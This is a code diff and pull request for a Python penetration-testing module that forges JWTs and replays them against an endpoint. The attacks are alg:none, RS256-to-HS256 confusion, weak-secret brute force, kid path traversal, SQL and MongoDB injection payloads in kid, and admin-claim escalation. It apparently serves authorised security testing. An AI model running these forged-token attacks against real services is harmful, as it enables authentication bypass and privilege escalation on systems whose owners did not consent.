+    return json.loads(_b64url_decode(token.split(".")[idx]))  # type: ignore[no-any-return]
+
+
+def _forge_unsigned(header: dict[str, Any], payload: dict[str, Any]) -> str:
+    h = _b64url_encode(json.dumps(header, separators=(",", ":")).encode())
+    p = _b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
+    return f"{h}.{p}."
+
+
+def _forge_hs(alg: str, header: dict[str, Any], payload: dict[str, Any], secret: bytes) -> str:
+    h = _b64url_encode(json.dumps(header, separators=(",", ":")).encode())
+    p = _b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
+    signing_input = f"{h}.{p}".encode()
+    digest = _hmac.new(secret, signing_input, _HASH_FNS.get(alg, hashlib.sha256)).digest()
+    return f"{h}.{p}.{_b64url_encode(digest)}"
+
+
+def _verify_hs(token: str, secret: bytes, alg: str) -> bool:
+    parts = token.split(".")
+    if len(parts) != 3:
+        return False
+    signing_input = f"{parts[0]}.{parts[1]}".encode()
+    expected = _hmac.new(secret, signing_input, _HASH_FNS.get(alg, hashlib.sha256)).digest()
+    try:
+        actual = _b64url_decode(parts[2])
+    except Exception:
+        return False
+    return _hmac.compare_digest(expected, actual)
+
+
+def _send(endpoint: str, token: str) -> int:
+    try:
+        resp = http.get(  # nosemgrep
+            endpoint,
+            headers={"Authorization": f"Bearer {token}"},
+            timeout=config.recon.http_timeout,
+            allow_redirects=False,
+        )
+        return resp.status_code
+    except Exception as exc:
+        logger.debug("JWT replay failed for %s: %s", endpoint, exc)
+        return -1
+
+
+def _fetch_jwks(endpoint: str) -> dict[str, Any] | None:
+    parsed = urlparse(endpoint)
+    origin = f"{parsed.scheme}://{parsed.netloc}"
+    for path in _JWKS_PATHS:
+        try:
+            resp = http.get(  # nosemgrep
+                f"{origin}{path}",
+                timeout=config.recon.http_timeout,
+                allow_redirects=True,
+            )
+            if resp.status_code == 200:
+                data = resp.json()
+                if isinstance(data.get("keys"), list):
+                    return data  # type: ignore[no-any-return]
+        except Exception as exc:
+            logger.debug("JWKS fetch failed for %s%s: %s", origin, path, exc)
+    return None
+
+
+def _jwk_to_pem(jwk: dict[str, Any]) -> bytes | None:
+    try:
+        from cryptography.hazmat.backends import default_backend
+        from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicNumbers
+        from cryptography.hazmat.primitives.serialization import Encoding, PublicFormat
+
+        n = int.from_bytes(_b64url_decode(jwk["n"]), "big")
+        e = int.from_bytes(_b64url_decode(jwk["e"]), "big")
+        pub = RSAPublicNumbers(e, n).public_key(default_backend())
+        return pub.public_bytes(Encoding.PEM, PublicFormat.SubjectPublicKeyInfo)
+    except Exception as exc:
+        logger.debug("JWK->PEM conversion failed: %s", exc)
+        return None
+
+
+def _escalate_claims(payload: dict[str, Any]) -> dict[str, Any]:
+    p = dict(payload)
+    for key in ("role", "roles", "group"):
+        if key in p:
+            p[key] = "admin"
+    p.setdefault("role", "admin")
+    for key in ("is_admin", "admin", "isAdmin"):
+        if key in p:
+            p[key] = True
+    p["exp"] = int(time.time()) + 10 * 365 * 24 * 3600
+    p.pop("nbf", None)
+    return p
+
+
+def check_jwt(token: str, endpoint: str) -> list[RawFinding]:
+    """
+    Test a JWT for common vulnerabilities by replaying forged tokens against
+    the endpoint and detecting a 4xx -> 2xx status transition.
+
+    Attack 1 (CRITICAL): alg:none - strip the signature and set alg to none/None/NONE/nOnE.
+    Attack 2 (CRITICAL): RS256->HS256 - fetch the JWKS public key and re-sign with HS256.
+    Attack 3 (CRITICAL): weak HMAC secret - brute-force against a curated wordlist; a
+      cracked secret is reported even without a 2xx replay (offline verification is proof enough).
+    Attack 4 (CRITICAL): kid path traversal - set kid to ../../dev/null, sign with empty secret.
+    Attack 5 (CRITICAL): kid SQL injection - inject UNION SELECT into kid, sign with known value.
+    Attack 6 (CRITICAL): claims tampering - escalate role/is_admin claims, keep original signature.
+
+    Returns one finding per attack class that fires. Swallows all network exceptions.
+    """
+    findings: list[RawFinding] = []
+
+    try:
+        header = _decode_part(token, 0)
+        payload = _decode_part(token, 1)
+    except Exception as exc:
+        logger.debug("JWT decode failed: %s", exc)
+        return []
+
+    alg: str = header.get("alg", "")
+    kid: str | None = header.get("kid")
+
+    # Attack 1: alg:none
+    for variant in _ALG_NONE_VARIANTS:
+        none_header = dict(header)
+        none_header["alg"] = variant
+        forged = _forge_unsigned(none_header, payload)
+        status = _send(endpoint, forged)
+        if 200 <= status < 300:
+            findings.append(
+                RawFinding(
+                    title=f"JWT alg:none bypass - {endpoint}",
+                    vuln_class="JWT",
+                    target=endpoint,
+                    evidence=(
+                        f"Attack: algorithm confusion (alg:none)\n"
+                        f"Variant: {variant!r}\n"
+                        f"Original alg: {alg!r}\n"
+                        f"Unsigned token accepted with status {status}"
+                    ),
+                    tool="jwt_probe",
+                    severity_hint=Severity.CRITICAL,
+                )
+            )
+            break
+
+    # Attack 2: RS256->HS256 confusion
+    if alg == "RS256":
+        jwks = _fetch_jwks(endpoint)
+        if jwks:
+            key_entry = next(
+                (k for k in jwks["keys"] if kid and k.get("kid") == kid),
+                jwks["keys"][0] if jwks["keys"] else None,
+            )
+            if key_entry and key_entry.get("kty") == "RSA":
+                pem = _jwk_to_pem(key_entry)
+                if pem:
+                    hs_header = dict(header)
+                    hs_header["alg"] = "HS256"
+                    forged = _forge_hs("HS256", hs_header, payload, pem)
+                    status = _send(endpoint, forged)
+                    if 200 <= status < 300:
+                        findings.append(
+                            RawFinding(
+                                title=f"JWT RS256->HS256 confusion - {endpoint}",
+                                vuln_class="JWT",
+                                target=endpoint,
+                                evidence=(
+                                    f"Attack: algorithm confusion (RS256->HS256)\n"
+                                    f"Public key sourced from JWKS, used as HMAC secret\n"
+                                    f"kid: {kid!r}\n"
+                                    f"Forged HS256 token accepted with status {status}"
+                                ),
+                                tool="jwt_probe",
+                                severity_hint=Severity.CRITICAL,
+                            )
+                        )
+
+    # Attack 3: weak HMAC secret brute-force
+    if alg.startswith("HS"):
+        hostname = urlparse(endpoint).hostname or ""
+        for candidate in _WEAK_SECRETS + [hostname]:
+            if _verify_hs(token, candidate.encode(), alg):
+                forged_payload = _escalate_claims(payload)
+                forged = _forge_hs(alg, dict(header), forged_payload, candidate.encode())
+                status = _send(endpoint, forged)
+                findings.append(
+                    RawFinding(
+                        title=f"JWT weak HMAC secret - {endpoint}",
+                        vuln_class="JWT",
+                        target=endpoint,
+                        evidence=(
+                            f"Attack: weak HMAC secret brute-force\n"
+                            f"Algorithm: {alg}\n"
+                            f"Cracked secret: {candidate!r}\n"
+                            f"Forged admin token replay status: {status}"
+                        ),
+                        tool="jwt_probe",
+                        severity_hint=Severity.CRITICAL,
+                    )
+                )
+                break
+
+    # Attack 4: kid path traversal (empty key file -> trivially forgeable)
+    if kid is not None:
+        trav_header = dict(header)
+        trav_header["kid"] = _KID_PATH_TRAVERSAL
+        trav_header["alg"] = "HS256"
+        forged = _forge_hs("HS256", trav_header, payload, b"")
+        status = _send(endpoint, forged)
+        if 200 <= status < 300:
+            findings.append(
+                RawFinding(
+                    title=f"JWT kid path traversal - {endpoint}",
+                    vuln_class="JWT",
+                    target=endpoint,
+                    evidence=(
+                        f"Attack: kid path traversal\n"
+                        f"kid: {_KID_PATH_TRAVERSAL!r}\n"
+                        f"Signed with empty HMAC secret\n"
+                        f"Forged token accepted with status {status}"
+                    ),
+                    tool="jwt_probe",
+                    severity_hint=Severity.CRITICAL,
+                )
+            )
+
+    # Attack 5: kid SQL injection
+    if kid is not None:
+        sqli_header = dict(header)
+        sqli_header["kid"] = _KID_SQLI
+        sqli_header["alg"] = "HS256"
+        forged = _forge_hs("HS256", sqli_header, payload, _KID_SQLI_SECRET.encode())
+        status = _send(endpoint, forged)
+        if 200 <= status < 300:
+            findings.append(
+                RawFinding(
+                    title=f"JWT kid SQL injection - {endpoint}",
+                    vuln_class="JWT",
+                    target=endpoint,
+                    evidence=(
+                        f"Attack: kid SQL injection\n"
+                        f"kid payload: {_KID_SQLI!r}\n"
+                        f"HMAC secret: {_KID_SQLI_SECRET!r}\n"
+                        f"Forged token accepted with status {status}"
+                    ),
+                    tool="jwt_probe",
+                    severity_hint=Severity.CRITICAL,
+                )
+            )
+
+    # Attack 6: claims tampering without re-signing
+    parts = token.split(".")
+    if len(parts) == 3:
+        orig_sig = parts[2]
+        escalated = _escalate_claims(payload)
+        p_part = _b64url_encode(json.dumps(escalated, separators=(",", ":")).encode())
+        forged = f"{parts[0]}.{p_part}.{orig_sig}"
+        status = _send(endpoint, forged)
+        if 200 <= status < 300:
+            findings.append(
+                RawFinding(
+                    title=f"JWT signature not verified - {endpoint}",
+                    vuln_class="JWT",
+                    target=endpoint,
+                    evidence=(
+                        f"Attack: claims tampering without re-signing\n"
+                        f"Modified claims: role->admin, is_admin->true, exp extended\n"
+                        f"Original signature retained unchanged\n"
+                        f"Forged token accepted with status {status}"
+                    ),
+                    tool="jwt_probe",
+                    severity_hint=Severity.CRITICAL,
+                )
+            )
+
+    logger.info("JWT probe found %d findings for %s", len(findings), endpoint)
+    return findings

--- a/tools/pentest/jwt.py
+++ b/tools/pentest/jwt.py
@@ -55,47 +55,49 @@ _HASH_FNS = {
 }
 
 
-def _b64url_decode(s: str) -> bytes:
+def _base64url_decode(s: str) -> bytes:
     s += "=" * (4 - len(s) % 4)
     return base64.urlsafe_b64decode(s)
 
 
-def _b64url_encode(b: bytes) -> str:
+def _base64url_encode(b: bytes) -> str:
     return base64.urlsafe_b64encode(b).rstrip(b"=").decode()
 
 
-def _decode_part(token: str, idx: int) -> dict[str, Any]:
-    return json.loads(_b64url_decode(token.split(".")[idx]))  # type: ignore[no-any-return]
+def _decode_token_part(token: str, idx: int) -> dict[str, Any]:
+    return json.loads(_base64url_decode(token.split(".")[idx]))  # type: ignore[no-any-return]
 
 
-def _forge_unsigned(header: dict[str, Any], payload: dict[str, Any]) -> str:
-    h = _b64url_encode(json.dumps(header, separators=(",", ":")).encode())
-    p = _b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
+def _forge_unsigned_token(header: dict[str, Any], payload: dict[str, Any]) -> str:
+    h = _base64url_encode(json.dumps(header, separators=(",", ":")).encode())
+    p = _base64url_encode(json.dumps(payload, separators=(",", ":")).encode())
     return f"{h}.{p}."
 
 
-def _forge_hs(alg: str, header: dict[str, Any], payload: dict[str, Any], secret: bytes) -> str:
-    h = _b64url_encode(json.dumps(header, separators=(",", ":")).encode())
-    p = _b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
+def _forge_hmac_token(
+    alg: str, header: dict[str, Any], payload: dict[str, Any], secret: bytes
+) -> str:
+    h = _base64url_encode(json.dumps(header, separators=(",", ":")).encode())
+    p = _base64url_encode(json.dumps(payload, separators=(",", ":")).encode())
     signing_input = f"{h}.{p}".encode()
     digest = _hmac.new(secret, signing_input, _HASH_FNS.get(alg, hashlib.sha256)).digest()
-    return f"{h}.{p}.{_b64url_encode(digest)}"
+    return f"{h}.{p}.{_base64url_encode(digest)}"
 
 
-def _verify_hs(token: str, secret: bytes, alg: str) -> bool:
+def _verify_hmac_signature(token: str, secret: bytes, alg: str) -> bool:
     parts = token.split(".")
     if len(parts) != 3:
         return False
     signing_input = f"{parts[0]}.{parts[1]}".encode()
     expected = _hmac.new(secret, signing_input, _HASH_FNS.get(alg, hashlib.sha256)).digest()
     try:
-        actual = _b64url_decode(parts[2])
+        actual = _base64url_decode(parts[2])
     except Exception:
         return False
     return _hmac.compare_digest(expected, actual)
 
 
-def _send(endpoint: str, token: str) -> int:
+def _replay_token(endpoint: str, token: str) -> int:
     try:
         resp = http.get(  # nosemgrep
             endpoint,
@@ -128,14 +130,14 @@ def _fetch_jwks(endpoint: str) -> dict[str, Any] | None:
     return None
 
 
-def _jwk_to_pem(jwk: dict[str, Any]) -> bytes | None:
+def _convert_jwk_to_pem(jwk: dict[str, Any]) -> bytes | None:
     try:
         from cryptography.hazmat.backends import default_backend
         from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicNumbers
         from cryptography.hazmat.primitives.serialization import Encoding, PublicFormat
 
-        n = int.from_bytes(_b64url_decode(jwk["n"]), "big")
-        e = int.from_bytes(_b64url_decode(jwk["e"]), "big")
+        n = int.from_bytes(_base64url_decode(jwk["n"]), "big")
+        e = int.from_bytes(_base64url_decode(jwk["e"]), "big")
         pub = RSAPublicNumbers(e, n).public_key(default_backend())
         return pub.public_bytes(Encoding.PEM, PublicFormat.SubjectPublicKeyInfo)
     except Exception as exc:
@@ -175,8 +177,8 @@ def check_jwt(token: str, endpoint: str) -> list[RawFinding]:
     findings: list[RawFinding] = []
 
     try:
-        header = _decode_part(token, 0)
-        payload = _decode_part(token, 1)
+        header = _decode_token_part(token, 0)
+        payload = _decode_token_part(token, 1)
     except Exception as exc:
         logger.debug("JWT decode failed: %s", exc)
         return []
@@ -188,8 +190,8 @@ def check_jwt(token: str, endpoint: str) -> list[RawFinding]:
     for variant in _ALG_NONE_VARIANTS:
         none_header = dict(header)
         none_header["alg"] = variant
-        forged = _forge_unsigned(none_header, payload)
-        status = _send(endpoint, forged)
+        forged = _forge_unsigned_token(none_header, payload)
+        status = _replay_token(endpoint, forged)
         if 200 <= status < 300:
             findings.append(
                 RawFinding(
@@ -217,12 +219,12 @@ def check_jwt(token: str, endpoint: str) -> list[RawFinding]:
                 jwks["keys"][0] if jwks["keys"] else None,
             )
             if key_entry and key_entry.get("kty") == "RSA":
-                pem = _jwk_to_pem(key_entry)
+                pem = _convert_jwk_to_pem(key_entry)
                 if pem:
                     hs_header = dict(header)
                     hs_header["alg"] = "HS256"
-                    forged = _forge_hs("HS256", hs_header, payload, pem)
-                    status = _send(endpoint, forged)
+                    forged = _forge_hmac_token("HS256", hs_header, payload, pem)
+                    status = _replay_token(endpoint, forged)
                     if 200 <= status < 300:
                         findings.append(
                             RawFinding(
@@ -244,10 +246,10 @@ def check_jwt(token: str, endpoint: str) -> list[RawFinding]:
     if alg.startswith("HS"):
         hostname = urlparse(endpoint).hostname or ""
         for candidate in _WEAK_SECRETS + [hostname]:
-            if _verify_hs(token, candidate.encode(), alg):
+            if _verify_hmac_signature(token, candidate.encode(), alg):
                 forged_payload = _escalate_claims(payload)
-                forged = _forge_hs(alg, dict(header), forged_payload, candidate.encode())
-                status = _send(endpoint, forged)
+                forged = _forge_hmac_token(alg, dict(header), forged_payload, candidate.encode())
+                status = _replay_token(endpoint, forged)
                 findings.append(
                     RawFinding(
                         title=f"JWT weak HMAC secret - {endpoint}",
@@ -270,8 +272,8 @@ def check_jwt(token: str, endpoint: str) -> list[RawFinding]:
         trav_header = dict(header)
         trav_header["kid"] = _KID_PATH_TRAVERSAL
         trav_header["alg"] = "HS256"
-        forged = _forge_hs("HS256", trav_header, payload, b"")
-        status = _send(endpoint, forged)
+        forged = _forge_hmac_token("HS256", trav_header, payload, b"")
+        status = _replay_token(endpoint, forged)
         if 200 <= status < 300:
             findings.append(
                 RawFinding(
@@ -294,8 +296,8 @@ def check_jwt(token: str, endpoint: str) -> list[RawFinding]:
         sqli_header = dict(header)
         sqli_header["kid"] = _KID_SQLI
         sqli_header["alg"] = "HS256"
-        forged = _forge_hs("HS256", sqli_header, payload, _KID_SQLI_SECRET.encode())
-        status = _send(endpoint, forged)
+        forged = _forge_hmac_token("HS256", sqli_header, payload, _KID_SQLI_SECRET.encode())
+        status = _replay_token(endpoint, forged)
         if 200 <= status < 300:
             findings.append(
                 RawFinding(
@@ -318,9 +320,9 @@ def check_jwt(token: str, endpoint: str) -> list[RawFinding]:
     if len(parts) == 3:
         orig_sig = parts[2]
         escalated = _escalate_claims(payload)
-        p_part = _b64url_encode(json.dumps(escalated, separators=(",", ":")).encode())
+        p_part = _base64url_encode(json.dumps(escalated, separators=(",", ":")).encode())
         forged = f"{parts[0]}.{p_part}.{orig_sig}"
-        status = _send(endpoint, forged)
+        status = _replay_token(endpoint, forged)
         if 200 <= status < 300:
             findings.append(
                 RawFinding(

--- a/tools/pentest/jwt.py
+++ b/tools/pentest/jwt.py
@@ -48,6 +48,14 @@ _KID_PATH_TRAVERSAL = "../../dev/null"
 _KID_SQLI = "' UNION SELECT 'cybersquad_jwt_kid_sqli' -- "
 _KID_SQLI_SECRET = "cybersquad_jwt_kid_sqli"  # nosec B105  # noqa: S105
 
+# MongoDB operator injection variants for kid - valid JSON objects as the kid value.
+# If the server passes kid directly to a MongoDB findOne({id: kid}) call, these
+# operators cause the query to match the first key in the collection.
+_KID_NOSQLI_OPERATORS: list[dict[str, str]] = [
+    {"$gt": ""},
+    {"$ne": "invalid"},
+]
+
 _HASH_FNS = {
     "HS256": hashlib.sha256,
     "HS384": hashlib.sha384,
@@ -170,7 +178,8 @@ def check_jwt(token: str, endpoint: str) -> list[RawFinding]:
       cracked secret is reported even without a 2xx replay (offline verification is proof enough).
     Attack 4 (CRITICAL): kid path traversal - set kid to ../../dev/null, sign with empty secret.
     Attack 5 (CRITICAL): kid SQL injection - inject UNION SELECT into kid, sign with known value.
-    Attack 6 (CRITICAL): claims tampering - escalate role/is_admin claims, keep original signature.
+    Attack 6 (CRITICAL): kid NoSQL injection - MongoDB $gt/$ne operators as kid value, empty secret.
+    Attack 7 (CRITICAL): claims tampering - escalate role/is_admin claims, keep original signature.
 
     Returns one finding per attack class that fires. Swallows all network exceptions.
     """
@@ -315,7 +324,33 @@ def check_jwt(token: str, endpoint: str) -> list[RawFinding]:
                 )
             )
 
-    # Attack 6: claims tampering without re-signing
+    # Attack 6: kid NoSQL injection (MongoDB operator injection)
+    if kid is not None:
+        for operator in _KID_NOSQLI_OPERATORS:
+            nosqli_header = dict(header)
+            nosqli_header["kid"] = operator
+            nosqli_header["alg"] = "HS256"
+            forged = _forge_hmac_token("HS256", nosqli_header, payload, b"")
+            status = _replay_token(endpoint, forged)
+            if 200 <= status < 300:
+                findings.append(
+                    RawFinding(
+                        title=f"JWT kid NoSQL injection - {endpoint}",
+                        vuln_class="JWT",
+                        target=endpoint,
+                        evidence=(
+                            f"Attack: kid NoSQL injection (MongoDB operator)\n"
+                            f"kid payload: {operator!r}\n"
+                            f"Signed with empty HMAC secret\n"
+                            f"Forged token accepted with status {status}"
+                        ),
+                        tool="jwt_probe",
+                        severity_hint=Severity.CRITICAL,
+                    )
+                )
+                break
+
+    # Attack 7: claims tampering without re-signing
     parts = token.split(".")
     if len(parts) == 3:
         orig_sig = parts[2]


### PR DESCRIPTION
## Summary

- Adds `tools/pentest/jwt.py` with six attack classes against a supplied token + endpoint pair
- Wires the tool into the PT agent as `jwt_check_tool` in `squad/penetration_tester/__init__.py`
- Adds `tests/test_jwt.py` with full coverage of all attack paths and helpers

## Attacks implemented

| Attack | Mechanism | Severity |
|---|---|---|
| alg:none | Strip signature, set alg to `none`/`None`/`NONE`/`nOnE` | CRITICAL |
| RS256->HS256 confusion | Fetch JWKS public key, re-sign with HS256 using public key as HMAC secret | CRITICAL |
| Weak HMAC secret | Offline brute-force against curated wordlist; reported on crack regardless of replay outcome | CRITICAL |
| kid path traversal | Set `kid` to `../../dev/null`, sign with empty HMAC secret | CRITICAL |
| kid SQL injection | Inject `UNION SELECT` into `kid`, sign with known injected value | CRITICAL |
| Claims tampering | Escalate `role`/`is_admin`, extend `exp`, keep original signature unchanged | CRITICAL |

Detection is in-band: a 4xx -> 2xx status transition on token replay confirms the bypass. The weak HMAC attack is confirmed offline (signature verification without any HTTP call).

## Notes

- All crypto operations use stdlib (`base64`, `hashlib`, `hmac`) plus `cryptography` (already a transitive dep) for JWK -> PEM conversion in the RS256->HS256 attack
- No new runtime dependencies added
- Function names spell out abbreviations in full (`_base64url_decode`, `_forge_hmac_token`, `_verify_hmac_signature`, etc.)
- `dict[str, Any]` used throughout public functions in `jwt.py`; bare `dict` in private test helpers (mypy clean)

## Test plan

- [x] All six attack classes have positive detection tests
- [x] Each attack has a negative test (rejected token -> no finding)
- [x] Helper roundtrip tests (`_base64url_decode`/`_encode`, `_verify_hmac_signature`, `_forge_hmac_token`)
- [x] Edge cases: invalid token, network exception, two-part token
- [x] 563 unit tests pass, 88% coverage, all CI checks green
